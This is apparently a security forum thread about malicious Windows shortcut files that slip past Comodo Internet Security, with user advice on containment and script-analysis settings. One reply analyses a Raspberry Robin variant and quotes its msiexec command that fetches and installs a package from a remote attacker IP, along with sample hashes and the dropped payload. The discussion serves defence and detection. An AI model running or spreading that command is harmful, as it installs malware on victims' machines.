I have some sample LNK files, but CIS doesn’t automatically contain them, and HIPS isn’t effective either. In the Windows properties target, it appears to be just a .cmd command, but there are actually numerous spaces added to exceed the display limit, making it look deceptive.
In the hex viewer, you can see the correct instructions. The spaces look like this:
I’m using the proactive configuration in CIS. After executing the sample, it successfully connected to the C&C server without any alerts—there were no containment, HIPS, or firewall alerts.
It is not enabled by default you must manually turn it on. There is a second switch that needs to be toggled on that is in the next column as shown in New_Style_xd screenshot.
Edit: Can you paste the full lnk command in your post, as I think I might know the problem thanks.
Well you should also check the active process task and set it to show contained only, as it might actually be in containment. Also check the file list changes log to see what was added as trusted, because it might be incorrectly rated as trusted. Finally you can try adding *\winrm.cmd to the script analysis section and enabling embedded code detection for all of the default listed applications.
Otherwise it is most likely a bug with embedded code detection logic, I know I reported it not working for msiexec.exe.
Just looking at things quickly, this guy seems to be a variant of Rasberry Robin in that it uses the command “msiexec /q /i hxxp://154.201.83.175:3989/@ /qn” to connect to a server. There are a number of these that differ in the embedded code, but I guess this particular file is:
0265e8680fd984e4d89b839a06b18498b5d81916fc672006b0a2c401faa162ad. This isn’t malicious in itself (no more that dashost.exe would be) but instead would be if it successfully connected out to a server to download a malicious package (which it does not do).
A variant for which the Powershell command does work is (for the connection request only): 68d22f5b74f63fa13c4723b43545ceef4f588e96d5c3009c08cbe13aea2196ad
The above want to connect out to download a package which would drop in C:\Tiles: this is the files APerfectDay, the executable of which is signed (although one certificate is outdated) by Tencent and is found to be benign; however also in the package is a dll which is not:
The above example is this (A MSI file that will drop the package and create a startup entry):
As Comodo will no allow the msi to run successfully, one must execute the msi in a VM with Containment off (not really suggesting this, by the way). Note that the installer is in Chinese and there is a few minute timeout).
Note that although all of these desire to be stealers, none achieves such a lofty goal.